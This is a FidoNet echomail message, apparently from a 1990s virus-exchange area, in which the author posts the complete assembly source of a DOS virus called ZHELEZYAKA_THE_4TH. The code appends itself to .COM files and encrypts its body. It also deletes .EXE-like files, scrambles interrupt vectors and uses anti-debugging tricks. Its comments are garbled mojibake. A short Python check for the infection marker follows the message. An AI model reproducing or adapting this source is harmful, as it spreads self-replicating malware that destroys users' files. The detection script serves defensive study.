;─ PVT.VIRII (2:465/65.4) ─────────────────────────────────────── PVT.VIRII ─
; Msg  : 1 of 64
; From : MeteO 2:5030/136 Tue 09 Nov 93 08:59
; To   : - *.* - Fri 11 Nov 94 08:10
; Subj : ViRii
;──────────────────────────────────────────────────────────────────────────────
;.RealName: Max Ivanov
;══════════════════════════════════════════════════════════════════════════════
;* Kicked-up by MeteO (2:5030/136)
;* Area : ABC.PVT.HACK (ABC: Hack...)
;* From : Alexei Galich, 123:1000/6.2 (31 Oct 94 13:44)
;* To : All
;* Subj : ViRii
;══════════════════════════════════════════════════════════════════════════════
;Greetings, All
;
;Here, I wrote a virus, a scary one, wrote it myself!
;Complaints are accepted from 1:00-8:00
;
;PS: Well, I don't know why it didn't understand the tabs, sorry.
;
;--------8<-------------------------------------------------------
;
;
; ZHELEZYAKA_THE_4TH
IDEAL MODEL TINY CODESEG ORG 100H LOCALS MAIN_BEGIN: JMP VIRUS_START_O DB 04H,0,' ZHELEZYAKA_THE_4TH ',0 EXIT_ADDRESS EQU 100H DOS EQU 21H VIRUS_SIGNATURE EQU 04H NUM_FIRST_BYTES EQU 4 ALREADY_INFECT EQU 3 COUNTER_ADDR EQU 510H FALSE_BYTE_ADDR EQU 104H COM_WILDCARD EQU (COM_WILDCARD_O-VIRUS_START_O) EXE_WILDCARD EQU (EXE_WILDCARD_O-VIRUS_START_O) WRITE_BUFFER EQU (WRITE_BUFFER_O-VIRUS_START_O) ORIGIN_DIR EQU (WRITE_BUFFER+NUM_FIRST_BYTES) NEW_DTA EQU (ORIGIN_DIR+65) COPY_BUFFER EQU (NEW_DTA+256) FALSE_BYTES EQU (COPY_BUFFER+WRITE_BUFFER) ORIGIN_BEGIN EQU (ORIGIN_BEGIN_O-VIRUS_START_O) MAIN_PART_LEN EQU (WRITE_BUFFER) INFECTED_NUMB EQU (INFECTED_NUMB_O-VIRUS_START_O) XOR_VALUE EQU (XOR_VALUE_O-VIRUS_START_O) XOR_VAL0 EQU (XOR_VAL0_O-VIRUS_START_O) XOR_VAL00 EQU (XOR_VAL00_O-VIRUS_START_O) XOR_VAL1 EQU (XOR_VAL1_O-VIRUS_START_O) XOR_VAL2 EQU (XOR_VAL2_O-VIRUS_START_O) XOR_VAL3 EQU (XOR_VAL3_O-VIRUS_START_O) XOR_VAL4 EQU (XOR_VAL4_O-VIRUS_START_O) BEGIN_CODING EQU (BEGIN_CODING_O-VIRUS_START_O) CONT_CODING EQU (CONT_CODING_O-VIRUS_START_O) MESSAGE EQU (MESSAGE_O-VIRUS_START_O) DOT EQU (DOT_O-VIRUS_START_O) VIRUS_START_O: CALL 
DETECT_BEGIN_O XOR_VAL0_O DB 0 DETECT_BEGIN_O: POP SI SUB SI,3 ; SI - ç «® ¢¨àãá JMP SHORT @@0 XOR_VAL00_O DB 0 @@0: LEA DI,[SI+BEGIN_CODING] CALL CODE BEGIN_CODING_O =$ MOV CX,NUM_FIRST_BYTES ; ‹¥ç¨¬ LEA DI,[SI+ORIGIN_BEGIN] ; ä ©« MOV BX,100H ; ¢ MOVE_LOOP: MOV AH,[DI] ; ¯ ¬ï⨠MOV [BX],AH ; INC DI ; INC BX ; LOOP MOVE_LOOP ; LEA DX,[SI+NEW_DTA] ; ‘â ¢¨¬ MOV AH,1AH ; ᢮î CALL CHECK ; DTA MOV AH,47H ; PUSH SI ; ‡ ¯®¬¨ ¥¬ LEA SI,[SI+ORIGIN_DIR+1] ; ⥪ã騩 CWD ; ª â «®£ CALL CHECK ; POP SI ; FIND_FIRST: LEA DX,[SI+COM_WILDCARD] ; ®¨áª ¯¥à¢®£® XOR CX,CX ; COM ä ©« MOV AH,4EH ; FIND_NEXT: INT DOS ; JNC @@L1 ; JMP NO_FILES_FOUND ; …᫨ ¥â, â® ... @@L1: LEA DX,[SI+NEW_DTA+1EH] ; Žâªà®¥¬ MOV AX,3D02H ; íâ®â CALL CHECK ; ä ©« MOV BX,AX ; à®ç¨â ¥¬ MOV AH,3FH ; ¯¥à¢ë¥ 4 LEA DX,[SI+ORIGIN_BEGIN] ; ¡ ©â MOV DI,DX ; ¨§ MOV CX,NUM_FIRST_BYTES ; í⮣® INT DOS ; ä ©« ADD DI,NUM_FIRST_BYTES-1 CMP [BYTE PTR DI],VIRUS_SIGNATURE JE @@L2 JMP INFECT_FILE @@L2: MOV AH,3EH ; ‡ ªà®¥¬ CALL CHECK ; ä ©« CONT_SEARCHING: MOV AH,4FH ; ©â¨ JMP FIND_NEXT ; á«¥¤ãî騩 ä ©« COM_WILDCARD_O DB '*.COM',0 EXE_WILDCARD_O DB '*.E*',0 MESSAGE_O DB 13,10,'ZHELEZYAKA_THE_4TH WITH YOU FOREVER',13,10,'$' DOT_O DB '..',0 NO_FILES_FOUND: MOV AH,3BH ; ‘¬¥é ¥¬áï LEA DX,[SI+DOT] ; ª â «®£ INT DOS ; ¢¢¥àå JC @@L4 ; ¯®ª JMP FIND_FIRST ; ¢®§¬®¦® @@L4: XOR AX,AX ; MOV ES,AX ; “¢¥«¨ç¨¢ ¥¬ MOV DI,COUNTER_ADDR ; áç¥â稪 MOV AX,[ES:DI] ; INC AL ; MOV [ES:DI],AX ; —â® CMP AL,ALREADY_INFECT ; ¡ã¤¥¬ JG INFECT_MORE ; ¤¥« âì? 
CMP AH,ALREADY_INFECT-2 ; JG BANNER ; JMP EXECUTE_PROG ; BANNER: XOR AX,AX ; ‘¡à®á áç¥â稪 MOV [ES:DI],AX LEA DX,[SI+MESSAGE] ; ‚뢮¤ MOV AH,9 ; á®®¡é¥¨ï CALL CHECK ; MOV CX,5 ; CONTINUE_NOISE: MOV DL,7 ; ¨áª MOV AH,2 ; INT DOS ; LOOP CONTINUE_NOISE JMP EXECUTE_PROG INFECT_MORE: XOR AL,AL ; ‘â¨à ¨¥ ¯¥à¢®£® .E* ä ©« INC AH MOV [ES:DI],AX LEA DI,[SI+ORIGIN_DIR] ; MOV [BYTE PTR DI],'\' ; ‚®ááâ ¢«¨¢ ¥¬ MOV AH,3BH ; áâ àë© XCHG DX,DI ; ª â «®£ INT DOS ; LEA DX,[SI+EXE_WILDCARD] XOR CX,CX MOV AH,4EH INT DOS JC EXECUTE_PROG LEA DX,[SI+NEW_DTA+1EH] MOV AH,41H INT 21H EXECUTE_PROG: MOV DX,80H ; ‘â ¢¨¬ MOV AH,1AH ; áâ àãî INT DOS ; DTA LEA DI,[SI+ORIGIN_DIR] ; MOV [BYTE PTR DI],'\' ; ‚®ááâ ¢«¨¢ ¥¬ MOV AH,3BH ; áâ àë© XCHG DX,DI ; ª â «®£ INT DOS ; MOV AX,DS MOV ES,AX MOV BP,100H ; JMP BP ; INFECT_FILE: XOR AL,AL ; MOV AH,[BYTE PTR SI+XOR_VALUE] ; @@IFZERO: INC AH ; JZ @@IFZERO ; ®¤£®â ¢«¨¢ ¥¬ MOV [BYTE PTR SI+XOR_VALUE],AH ; ®¢ë© MOV [SI+XOR_VAL0],AH ; ª®¤ MOV [SI+XOR_VAL00],AH ; MOV [SI+XOR_VAL1],AH ; MOV [SI+XOR_VAL2],AH ; MOV [SI+XOR_VAL3],AH ; MOV [SI+XOR_VAL4],AH ; MOV AX,5700H ; ‡ ¯®¬¨ ¥¬ CALL CHECK ; ¢à¥¬ï PUSH CX ; ᮧ¤ ¨ï PUSH DX ; XOR CX,CX ; ˆ¤¥¬ XOR DX,DX ; MOV AX,4202H ; ª®¥æ CALL CHECK ; ä ©« SUB AX,3 ; ®¤£®â ¢«¨¢ ¥¬ MOV [BYTE PTR SI+WRITE_BUFFER],0E9H ; ®¢ë¥ MOV [SI+WRITE_BUFFER+1],AX ; 4 ¡ ©â MOV [BYTE PTR SI+WRITE_BUFFER+3],VIRUS_SIGNATURE MOV CX,MAIN_PART_LEN ; MOV DI,SI ; Š®¯¨à㥬 COPY_LOOP: MOV AH,[DI] ; ¢¨àãá MOV [DI+COPY_BUFFER],AH ; ¢ INC DI ; ¡ãää¥à LOOP COPY_LOOP ; LEA DI,[SI+COPY_BUFFER+BEGIN_CODING] ; Š®¤¨à㥬 CALL CODER_DECODER ; ¥£® LEA DI,[SI+COPY_BUFFER+CONT_CODING] CALL FIRST_CODE MOV CX,MAIN_PART_LEN ; ®¤¡¨à ¥¬ MOV AL,[BYTE PTR FALSE_BYTE_ADDR] ; ¤«¨ã ADD AL,[FALSE_BYTES] ; XOR AH,AH ; ADD CX,AX ; ¨è¥¬ LEA DX,[SI+COPY_BUFFER] ; £« ¢ãî MOV AH,40H ; ç áâì INT DOS ; ¢¨àãá XOR CX,CX ; ˆ¤¥¬ XOR DX,DX ; MOV AX,4200H ; ç «® CALL CHECK ; ä ©« MOV CX,NUM_FIRST_BYTES ; ˆá¯à ¢«ï¥¬ LEA DX,[SI+WRITE_BUFFER] ; ¯¥à¢ë¥ MOV AH,40H ; ¡ ©âë INT DOS ; ä ©« POP DX ; ‚®ááâ 
¢«¨¢ ¥¬ POP CX ; ¢à¥¬ï MOV AX,5701H ; ᮧ¤ ¨ï CALL CHECK ; MOV AH,3EH ; ‡ ªàë¢ ¥¬ INT DOS ; ä ©« CALL CODE_INT JMP EXECUTE_PROG ORIGIN_BEGIN_O DB 0CDH,20H,90H,90H CONT_CODING_O =$ CODER_DECODER: MOV CX,CODER_DECODER-BEGIN_CODING_O-1 MOV AH,[SI+XOR_VALUE] XOR AL,AL OUT 21H,AL CODING_LOOP: IN AL,21H ADD AL,AH XOR [DI],AL ; ‘ ¬ INC DI ; ª®¤¨à®¢é¨ª ADD AL,[FALSE_BYTE_ADDR] OUT 21H,AL ; LOOP CODING_LOOP ; XOR AL,AL OUT 21H,AL RET CHECK: PUSH AX ; «®ª¨à®¢ª ¯à¥àë¢ ¨ï PUSHF MOV AL,0FEH OUT 21H,AL MOV AH,4FH POPF POP AX INT 21H PUSH AX PUSHF IN AL,21H CMP AL,0FEH @@HALT: JNE @@HALT XOR AL,AL OUT 21H,AL POPF POP AX RET CODE_INT: XOR AX,AX ; Š®¤¨à®¢ ¨¥ INT 0 - 3 MOV ES,AX MOV CX,12 COD_INT_CON: MOV BX,CX XOR [BYTE PTR ES:BX],10101010B LOOP COD_INT_CON PUSH CS POP ES RET ; ------------ FIRST_CODE: MOV CX,FIRST_CODE-CODER_DECODER ; ।¢ à¨â¥«ìë© MOV AH,[SI+XOR_VALUE] ; ª®¤¨à®¢é¨ª JMP SHORT FIRST_COD_LOOP XOR_VAL1_O DB 0 FIRST_COD_LOOP: XOR [DI],AH INC DI JMP SHORT @@2 XOR_VAL2_O DB 0 @@2: LOOP FIRST_COD_LOOP RET XOR_VALUE_O DB 0 CODE: PUSH DI LEA DI,[SI+CONT_CODING] JMP @@3 XOR_VAL3_O DB 0 @@3: CALL FIRST_CODE MOV AH,40H JMP @@4 XOR_VAL4_O DB 0 @@4: CALL CHECK ; —â®¡ë ®¡¬ ãâì ¯¥à¥å¢ â稪 CALL CODE_INT POP DI JMP SHORT CODER_DECODER WRITE_BUFFER_O =$ END MAIN_BEGIN
;---------------8<-------------------------------------------------
;
;- All this would be funny, if it didn't hurt so much.
;
; -= iR0NMAN =-
;
;-+- GoldED 2.50.B1016+
; + Origin: THE POLICE STATION IS A HOLIDAY !!! (123:1000/6.2)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; ■ The Me┬eO
;
;/p Check for code segment overrides in protected mode
;
;--- Aidstest Null: /Kill
; * Origin: ·PVT.ViRII·main·board· / Virus Research labs. (2:5030/136)
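A defender-side check for the infection marker visible in the listing (first byte 0E9H, `VIRUS_SIGNATURE` 04H at file offset 3, and a near jump to the old end of the file), as an added example that is not part of the original message. The function names, the assumed `E8 01 00` encoding of the `CALL` at `VIRUS_START_O`, and the sample images are constructed here for illustration.

```python
import struct

# Constants taken from the listing above.
JMP_NEAR = 0xE9            # byte 0 written from WRITE_BUFFER
VIRUS_SIGNATURE = 0x04     # VIRUS_SIGNATURE EQU 04H, written at file offset 3
NUM_FIRST_BYTES = 4        # NUM_FIRST_BYTES EQU 4
# Assumption: "CALL DETECT_BEGIN_O" skipping one DB byte assembles to E8 01 00.
ENTRY_STUB = b"\xE8\x01\x00"


def jump_target(data: bytes):
    """File offset the leading near JMP lands on, or None if there is no marker."""
    if len(data) < NUM_FIRST_BYTES:
        return None
    if data[0] != JMP_NEAR or data[3] != VIRUS_SIGNATURE:
        return None
    (rel16,) = struct.unpack_from("<H", data, 1)
    # The listing stores (old file length - 3), so the offset is rel16 + 3.
    return (rel16 + 3) & 0xFFFF


def classify(data: bytes) -> str:
    """Return 'clean', 'marker-only' or 'marker+entry-stub' for a COM image."""
    target = jump_target(data)
    if target is None:
        return "clean"
    if data[target:target + len(ENTRY_STUB)] == ENTRY_STUB:
        return "marker+entry-stub"
    return "marker-only"        # same 4-byte test the listing uses; can be chance


def constructed_samples():
    """Inert, constructed byte strings; none of them contains the body above."""
    host = b"\xB4\x4C\xCD\x21" + b"\x90" * 12            # 16-byte benign COM
    patched = (bytes([JMP_NEAR]) + struct.pack("<H", len(host) - 3)
               + bytes([VIRUS_SIGNATURE]) + host[4:])
    appended = patched + ENTRY_STUB + b"\x00" * 8        # filler, not virus code
    coincidence = b"\xE9\x10\x00\x04" + b"\x90" * 32     # marker bytes by chance
    return {"host": host, "appended": appended, "coincidence": coincidence}


if __name__ == "__main__":
    for name, image in constructed_samples().items():
        print(f"{name:12} target={jump_target(image)} -> {classify(image)}")
```

A `marker-only` result is weak evidence on its own, since any COM file may begin with those bytes; the entry-stub match at the jump target is what ties the header to an appended body.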